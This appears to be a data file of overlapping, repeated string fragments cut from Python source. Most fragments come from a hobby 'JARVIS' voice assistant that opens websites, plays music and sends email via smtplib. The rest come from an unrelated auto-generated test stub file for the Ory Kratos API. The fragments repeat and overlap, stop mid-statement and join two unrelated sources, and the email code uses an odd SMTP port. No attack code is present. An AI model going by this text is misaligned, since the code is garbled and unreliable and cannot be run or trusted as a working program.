"speak(\"Good night\") speak(\"I am JARVIS how can i help you\")", "query: # filelocation = \"path of the particular file like", "exit() except Exception as e: print(e) speak(\"Sorry,I am not able", "query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \"", "= r.listen(source) #Do read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in')", "vijesh\" in query: try: speak(\"What should i say\")#error present content", "in query: # filelocation = \"path of the particular file", "\"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in", "# filelocation = \"path of the particular file like above\"", "# webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\") elif", "google\" in query: webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir", "if __name__ == '__main__': wish_me() while True: query =take_command().lower() if", "string :return: \"\"\" r = sr.Recognizer() with sr.Microphone() as source:", "sentence to decrease sentence decreease sentence speak(\"According to wikipedia\") #print(results)", "sentence decreease sentence speak(\"According to wikipedia\") #print(results) speak(results) elif 'open", "Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in query: # filelocation", "\" email to vijayesh\" or \"email to vijesh\" in query:", "pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the", "os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime =", "elif \"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs =", "input from the user and returns a string :return: \"\"\"", "to wikipedia\") #print(results) speak(results) elif 'open youtube' in query: #", "sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5 #", "0 and hour < 12: speak(\"Good morning\") elif hour >=", "speak(\"I am JARVIS how can i help you\") if __name__", "\"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit() except Exception as", "hour < 18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am", "'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\"", "command\" in query: # filelocation = \"path of the particular", "pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath)", "sr import wikipedia import webbrowser import os import smtplib engine", "again please\") return \"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28)", "import datetime import speech_recognition as sr import wikipedia import webbrowser", "try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except", "complete a sentence audio = r.listen(source) #Do read details try:", "datetime import speech_recognition as sr import wikipedia import webbrowser import", "elif \"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time", "like above\" # os.startfile(filelocation) elif \" email to vijayesh\" or", "=smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me():", "= datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \" open pycharm\"", "take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit()", "To change the voice to female change 0 to 1.", "12 and hour < 18: speak(\"Good afternoon\") else: speak(\"Good night\")", "< 18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS", "query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease", "import wikipedia import webbrowser import os import smtplib engine =", "please\") return \"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) #", "except Exception as e: #print(e) print(\"Say that again please\") return", "in query: webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir =", ": {query}\\n') except Exception as e: #print(e) print(\"Say that again", "pass def take_command(): \"\"\" It takes microphone input from the", "r.pause_threshold = 1.5 # It will wait 1.5 seconds to", "r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception as e: #print(e)", "e: #print(e) print(\"Say that again please\") return \"None\" return query", ">= 0 and hour < 12: speak(\"Good morning\") elif hour", "server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def", "= r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception as e:", "else: speak(\"Good night\") speak(\"I am JARVIS how can i help", "to decrease sentence decreease sentence speak(\"According to wikipedia\") #print(results) speak(results)", "os.startfile(filelocation) elif \" email to vijayesh\" or \"email to vijesh\"", "server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if", "#Do read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said", "and hour < 18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I", "= sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5", "wish_me() while True: query =take_command().lower() if 'wikipedia' in query: speak(\"Searching", "12: speak(\"Good morning\") elif hour >= 12 and hour <", "engine.setProperty('voice', voices[0].id) # To change the voice to female change", "the voice to female change 0 to 1. def speak(audio):", "to 1. def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\"", "webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\") elif \"play music\"", "Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in query: #", "\"email to vijesh\" in query: try: speak(\"What should i say\")#error", "voices[0].id) # To change the voice to female change 0", "It takes microphone input from the user and returns a", "query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open", "sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5 # It will", "youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in", "True: query =take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\") query", "music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs)", "or \"email to vijesh\" in query: try: speak(\"What should i", "take_command(): \"\"\" It takes microphone input from the user and", "query: try: speak(\"What should i say\")#error present content = take_command()", "to female change 0 to 1. def speak(audio): engine.say(audio) engine.runAndWait()", "decreease sentence speak(\"According to wikipedia\") #print(results) speak(results) elif 'open youtube'", "as source: print(\"Listening...\") r.pause_threshold = 1.5 # It will wait", "engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To", "server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if hour >=", "= \"path of the particular file like above\" # os.startfile(filelocation)", "webbrowser import os import smtplib engine = pyttsx3.init('sapi5') voices =", "hour >= 12 and hour < 18: speak(\"Good afternoon\") else:", "return \"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465)", "increase sentence to decrease sentence decreease sentence speak(\"According to wikipedia\")", "strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \" open", "query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\")", "It will wait 1.5 seconds to complete a sentence audio", "# os.startfile(filelocation) elif \" email to vijayesh\" or \"email to", "server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if hour >= 0", "query =take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\") query =", "elif hour >= 12 and hour < 18: speak(\"Good afternoon\")", "e: print(e) speak(\"Sorry,I am not able to send this email\")", "help you\") if __name__ == '__main__': wish_me() while True: query", "\" open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition", "= wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence decreease", "Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in query:", "0 to 1. def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command():", "speak(\"Email has been sent\") exit() except Exception as e: print(e)", "to complete a sentence audio = r.listen(source) #Do read details", "in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1]))", "from the user and returns a string :return: \"\"\" r", "sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close()", "present content = take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has", "to vijesh\" in query: try: speak(\"What should i say\")#error present", "datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \" open pycharm\" in", "pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\"", "how can i help you\") if __name__ == '__main__': wish_me()", "as sr import wikipedia import webbrowser import os import smtplib", "server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour =", "the user and returns a string :return: \"\"\" r =", "to vijayesh\" or \"email to vijesh\" in query: try: speak(\"What", "above\" # os.startfile(filelocation) elif \" email to vijayesh\" or \"email", "in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query:", "pyttsx3 import datetime import speech_recognition as sr import wikipedia import", "= \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\"", "query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########')", "query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read", "of the particular file like above\" # os.startfile(filelocation) elif \"", "filelocation = \"path of the particular file like above\" #", "a sentence audio = r.listen(source) #Do read details try: print(\"Recognizing\")", "elif \"open google\" in query: webbrowser.open(\"google.com\") elif \"play music\" in", "the particular file like above\" # os.startfile(filelocation) elif \" email", "os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The", "a string :return: \"\"\" r = sr.Recognizer() with sr.Microphone() as", "sendEmail(to,content) speak(\"Email has been sent\") exit() except Exception as e:", "wait 1.5 seconds to complete a sentence audio = r.listen(source)", "\"open command\" in query: # filelocation = \"path of the", "email to vijayesh\" or \"email to vijesh\" in query: try:", "r.listen(source) #Do read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user", "speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS how can", "and returns a string :return: \"\"\" r = sr.Recognizer() with", "in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To", "voice to female change 0 to 1. def speak(audio): engine.say(audio)", "JARVIS how can i help you\") if __name__ == '__main__':", "vijayesh\" or \"email to vijesh\" in query: try: speak(\"What should", "except Exception as e: print(e) speak(\"Sorry,I am not able to", "< 12: speak(\"Good morning\") elif hour >= 12 and hour", "content = take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been", "import webbrowser import os import smtplib engine = pyttsx3.init('sapi5') voices", "engine.runAndWait() pass def take_command(): \"\"\" It takes microphone input from", "print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")", "time is {strtime}\") elif \" open pycharm\" in query: pycharmpath", "can i help you\") if __name__ == '__main__': wish_me() while", "speak(\"According to wikipedia\") #print(results) speak(results) elif 'open youtube' in query:", ":return: \"\"\" r = sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\")", "=\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in", "r = sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold =", "in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif", "audio = r.listen(source) #Do read details try: print(\"Recognizing\") query =", "that again please\") return \"None\" return query def sendEmail(to,content): server", "while True: query =take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\")", "elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open", "query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif", "= take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\")", "import pyttsx3 import datetime import speech_recognition as sr import wikipedia", "print(\"Say that again please\") return \"None\" return query def sendEmail(to,content):", "'__main__': wish_me() while True: query =take_command().lower() if 'wikipedia' in query:", "has been sent\") exit() except Exception as e: print(e) speak(\"Sorry,I", "# To change the voice to female change 0 to", "#print(results) speak(results) elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\")", "= os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime", "if hour >= 0 and hour < 12: speak(\"Good morning\")", "hour < 12: speak(\"Good morning\") elif hour >= 12 and", "# It will wait 1.5 seconds to complete a sentence", "say\")#error present content = take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email", "said : {query}\\n') except Exception as e: #print(e) print(\"Say that", "songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query:", "is {strtime}\") elif \" open pycharm\" in query: pycharmpath =\"C:\\\\Program", "speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It takes microphone", "source: print(\"Listening...\") r.pause_threshold = 1.5 # It will wait 1.5", "sent\") exit() except Exception as e: print(e) speak(\"Sorry,I am not", "read more increase sentence to decrease sentence decreease sentence speak(\"According", "in query: try: speak(\"What should i say\")#error present content =", "sentence speak(\"According to wikipedia\") #print(results) speak(results) elif 'open youtube' in", "__name__ == '__main__': wish_me() while True: query =take_command().lower() if 'wikipedia'", "= query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase sentence to", "webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\") elif \"play", "\"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) #", "#elif \"open command\" in query: # filelocation = \"path of", "file like above\" # os.startfile(filelocation) elif \" email to vijayesh\"", "wikipedia import webbrowser import os import smtplib engine = pyttsx3.init('sapi5')", "import os import smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices')", "should i say\")#error present content = take_command() to = \"<EMAIL>\"", "\"\"\" r = sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold" ]
[ "\"\"\" pass def test_admin_update_identity(self): \"\"\"Test case for admin_update_identity Update an", "Update an Identity # noqa: E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self):", "port you should use something like Nginx, Ory Oathkeeper, or", "# noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case for", "Public and administrative APIs are exposed on different ports. Public", "tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case for admin_create_identity Create an", "# noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for", "\"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings", "APIs. Public and administrative APIs are exposed on different ports.", "\"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow Submit a", "# noqa: E501 \"\"\" pass if __name__ == '__main__': unittest.main()", "test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete Verification Flow # noqa:", "self.api = V0alpha1Api() # noqa: E501 def tearDown(self): pass def", "create_self_service_logout_flow_url_for_browsers Create a Logout URL for Browsers # noqa: E501", "submit_self_service_logout_flow_without_browser Perform Logout for APIs, Services, Apps, ... # noqa:", "for get_self_service_recovery_flow Get Recovery Flow # noqa: E501 \"\"\" pass", "any other technology capable of authorizing incoming requests. # noqa:", "case for get_self_service_recovery_flow Get Recovery Flow # noqa: E501 \"\"\"", "test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow Get Settings Flow # noqa:", "case for get_self_service_error Get Self-Service Errors # noqa: E501 \"\"\"", "\"\"\"Test case for get_self_service_login_flow Get Login Flow # noqa: E501", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self):", "APIs, Services, Apps, ... # noqa: E501 \"\"\" pass def", "case for get_self_service_settings_flow Get Settings Flow # noqa: E501 \"\"\"", "the Current HTTP Session Belongs To # noqa: E501 \"\"\"", "# noqa: E501 def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case", "\"\"\" pass def test_admin_list_identities(self): \"\"\"Test case for admin_list_identities List Identities", "Initialize Settings Flow for Browsers # noqa: E501 \"\"\" pass", "# noqa: E501 \"\"\" pass def test_admin_get_identity(self): \"\"\"Test case for", "E501 \"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete", "\"\"\"Test case for get_json_schema \"\"\" pass def test_get_self_service_error(self): \"\"\"Test case", "Link # noqa: E501 \"\"\" pass def test_admin_delete_identity(self): \"\"\"Test case", "test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs,", "stubs\"\"\" def setUp(self): self.api = V0alpha1Api() # noqa: E501 def", "\"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for Browsers #", "case for submit_self_service_verification_flow Complete Verification Flow # noqa: E501 \"\"\"", "\"\"\" pass def test_get_json_schema(self): \"\"\"Test case for get_json_schema \"\"\" pass", "any protection while administrative APIs should never be exposed without", "Identities # noqa: E501 \"\"\" pass def test_admin_update_identity(self): \"\"\"Test case", "noqa: E501 def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case for", "pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize Login Flow", "for initialize_self_service_verification_flow_without_browser Initialize Verification Flow for APIs, Services, Apps, ...", "pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow", "for get_self_service_settings_flow Get Settings Flow # noqa: E501 \"\"\" pass", "initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs, Services, Apps, ... #", "APIs can face the public internet without any protection while", "def test_to_session(self): \"\"\"Test case for to_session Check Who the Current", "\"\"\"Test case for admin_create_self_service_recovery_link Create a Recovery Link # noqa:", "... # noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case", "\"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings", "protection while administrative APIs should never be exposed without prior", "case for initialize_self_service_registration_flow_without_browser Initialize Registration Flow for APIs, Services, Apps,", "noqa: E501 \"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow", "for submit_self_service_recovery_flow Complete Recovery Flow # noqa: E501 \"\"\" pass", "should never be exposed without prior authorization. To protect the", "case for create_self_service_logout_flow_url_for_browsers Create a Logout URL for Browsers #", "exposed on different ports. Public APIs can face the public", "noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow(self): \"\"\"Test case for submit_self_service_logout_flow", "for admin_get_identity Get an Identity # noqa: E501 \"\"\" pass", "Registration Flow # noqa: E501 \"\"\" pass def test_get_self_service_settings_flow(self): \"\"\"Test", "test_submit_self_service_logout_flow(self): \"\"\"Test case for submit_self_service_logout_flow Complete Self-Service Logout # noqa:", "Create a Logout URL for Browsers # noqa: E501 \"\"\"", "pass def test_submit_self_service_login_flow(self): \"\"\"Test case for submit_self_service_login_flow Submit a Login", "a Registration Flow # noqa: E501 \"\"\" pass def test_submit_self_service_settings_flow(self):", "case for submit_self_service_recovery_flow Complete Recovery Flow # noqa: E501 \"\"\"", "submit_self_service_recovery_flow Complete Recovery Flow # noqa: E501 \"\"\" pass def", "\"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete Verification", "test_initialize_self_service_verification_flow_without_browser(self): \"\"\"Test case for initialize_self_service_verification_flow_without_browser Initialize Verification Flow for APIs,", "def test_get_self_service_login_flow(self): \"\"\"Test case for get_self_service_login_flow Get Login Flow #", "noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for initialize_self_service_recovery_flow_without_browser", "Flow # noqa: E501 \"\"\" pass def test_get_self_service_settings_flow(self): \"\"\"Test case", "\"\"\"Test case for admin_update_identity Update an Identity # noqa: E501", "# noqa: E501 \"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for", "Login Flow # noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow(self): \"\"\"Test", "from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api", "test_initialize_self_service_registration_flow_without_browser(self): \"\"\"Test case for initialize_self_service_registration_flow_without_browser Initialize Registration Flow for APIs,", "to_session Check Who the Current HTTP Session Belongs To #", "get_json_schema \"\"\" pass def test_get_self_service_error(self): \"\"\"Test case for get_self_service_error Get", "Settings Flow # noqa: E501 \"\"\" pass def test_get_self_service_verification_flow(self): \"\"\"Test", "ports. Public APIs can face the public internet without any", "# noqa: E501 \"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case for", "E501 \"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow Complete", "you should use something like Nginx, Ory Oathkeeper, or any", "# noqa: E501 \"\"\" pass def test_get_self_service_login_flow(self): \"\"\"Test case for", "case for admin_delete_identity Delete an Identity # noqa: E501 \"\"\"", "Logout # noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow_without_browser(self): \"\"\"Test case", "an Identity # noqa: E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self): \"\"\"Test", "initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow for APIs, Services, Apps, ... #", "case for initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs, Services, Apps,", "Initialize Verification Flow for Browser Clients # noqa: E501 \"\"\"", "Apps, ... # noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test", "\"\"\"Test case for submit_self_service_verification_flow Complete Verification Flow # noqa: E501", "E501 \"\"\" pass def test_initialize_self_service_registration_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_registration_flow_for_browsers Initialize", "pass def test_admin_update_identity(self): \"\"\"Test case for admin_update_identity Update an Identity", "administative API port you should use something like Nginx, Ory", "Settings Flow for Browsers # noqa: E501 \"\"\" pass def", "initialize_self_service_settings_flow_for_browsers Initialize Settings Flow for Browsers # noqa: E501 \"\"\"", "def test_admin_list_identities(self): \"\"\"Test case for admin_list_identities List Identities # noqa:", "Flow # noqa: E501 \"\"\" pass def test_submit_self_service_logout_flow(self): \"\"\"Test case", "test_admin_create_self_service_recovery_link(self): \"\"\"Test case for admin_create_self_service_recovery_link Create a Recovery Link #", "E501 \"\"\" pass def test_get_self_service_registration_flow(self): \"\"\"Test case for get_self_service_registration_flow Get", "def test_submit_self_service_logout_flow(self): \"\"\"Test case for submit_self_service_logout_flow Complete Self-Service Logout #", "E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for initialize_self_service_recovery_flow_without_browser Initialize", "noqa: E501 \"\"\" pass def test_admin_update_identity(self): \"\"\"Test case for admin_update_identity", "public and administrative Ory Kratos APIs. Public and administrative APIs", "\"\"\"Test case for initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow for APIs, Services,", "= V0alpha1Api() # noqa: E501 def tearDown(self): pass def test_admin_create_identity(self):", "for submit_self_service_login_flow Submit a Login Flow # noqa: E501 \"\"\"", "E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test stubs\"\"\" def setUp(self): self.api", "# noqa: E501 \"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test case for", "Verification Flow # noqa: E501 \"\"\" pass def test_to_session(self): \"\"\"Test", "test_get_self_service_error(self): \"\"\"Test case for get_self_service_error Get Self-Service Errors # noqa:", "# noqa: E501 The version of the OpenAPI document: v0.7.0-alpha.1", "for initialize_self_service_verification_flow_for_browsers Initialize Verification Flow for Browser Clients # noqa:", "\"\"\" Ory Kratos API Documentation for all public and administrative", "are exposed on different ports. Public APIs can face the", "def test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow Complete Recovery Flow #", "def test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow Get Settings Flow #", "Recovery Link # noqa: E501 \"\"\" pass def test_admin_delete_identity(self): \"\"\"Test", "case for get_json_schema \"\"\" pass def test_get_self_service_error(self): \"\"\"Test case for", "# noqa: E501 \"\"\" pass def test_get_self_service_verification_flow(self): \"\"\"Test case for", "Initialize Verification Flow for APIs, Services, Apps, ... # noqa:", "... # noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_for_browsers(self): \"\"\"Test case", "\"\"\"Test case for submit_self_service_recovery_flow Complete Recovery Flow # noqa: E501", "E501 \"\"\" pass def test_admin_list_identities(self): \"\"\"Test case for admin_list_identities List", "for submit_self_service_settings_flow Complete Settings Flow # noqa: E501 \"\"\" pass", "initialize_self_service_verification_flow_without_browser Initialize Verification Flow for APIs, Services, Apps, ... #", "def test_submit_self_service_login_flow(self): \"\"\"Test case for submit_self_service_login_flow Submit a Login Flow", "case for get_self_service_verification_flow Get Verification Flow # noqa: E501 \"\"\"", "for initialize_self_service_login_flow_for_browsers Initialize Login Flow for Browsers # noqa: E501", "Belongs To # noqa: E501 \"\"\" pass if __name__ ==", "like Nginx, Ory Oathkeeper, or any other technology capable of", "\"\"\" pass def test_submit_self_service_settings_flow(self): \"\"\"Test case for submit_self_service_settings_flow Complete Settings", "Identity # noqa: E501 \"\"\" pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test case", "Browsers # noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case", "\"\"\"Test case for initialize_self_service_registration_flow_for_browsers Initialize Registration Flow for Browsers #", "noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_verification_flow_for_browsers", "\"\"\"Test case for submit_self_service_logout_flow_without_browser Perform Logout for APIs, Services, Apps,", "\"\"\"Test case for admin_delete_identity Delete an Identity # noqa: E501", "administrative APIs are exposed on different ports. Public APIs can", "Session Belongs To # noqa: E501 \"\"\" pass if __name__", "def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for initialize_self_service_recovery_flow_without_browser Initialize Recovery Flow for", "pass def test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow Submit a Registration", "for Browser Clients # noqa: E501 \"\"\" pass def test_initialize_self_service_verification_flow_without_browser(self):", "\"\"\" pass def test_admin_create_self_service_recovery_link(self): \"\"\"Test case for admin_create_self_service_recovery_link Create a", "test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize Login Flow for APIs,", "the OpenAPI document: v0.7.0-alpha.1 Contact: <EMAIL> Generated by: https://openapi-generator.tech \"\"\"", "Logout for APIs, Services, Apps, ... # noqa: E501 \"\"\"", "admin_list_identities List Identities # noqa: E501 \"\"\" pass def test_admin_update_identity(self):", "import V0alpha1Api # noqa: E501 class TestV0alpha1Api(unittest.TestCase): \"\"\"V0alpha1Api unit test", "test_get_self_service_registration_flow(self): \"\"\"Test case for get_self_service_registration_flow Get Registration Flow # noqa:", "\"\"\"Test case for admin_list_identities List Identities # noqa: E501 \"\"\"", "Initialize Registration Flow for Browsers # noqa: E501 \"\"\" pass", "noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser", "\"\"\" pass def test_get_self_service_error(self): \"\"\"Test case for get_self_service_error Get Self-Service", "E501 \"\"\" pass def test_initialize_self_service_verification_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_verification_flow_for_browsers Initialize", "admin_delete_identity Delete an Identity # noqa: E501 \"\"\" pass def", "test_admin_delete_identity(self): \"\"\"Test case for admin_delete_identity Delete an Identity # noqa:", "for submit_self_service_registration_flow Submit a Registration Flow # noqa: E501 \"\"\"", "noqa: E501 \"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow", "Login Flow # noqa: E501 \"\"\" pass def test_get_self_service_recovery_flow(self): \"\"\"Test", "# noqa: E501 \"\"\" pass def test_initialize_self_service_login_flow_for_browsers(self): \"\"\"Test case for", "def test_get_self_service_verification_flow(self): \"\"\"Test case for get_self_service_verification_flow Get Verification Flow #", 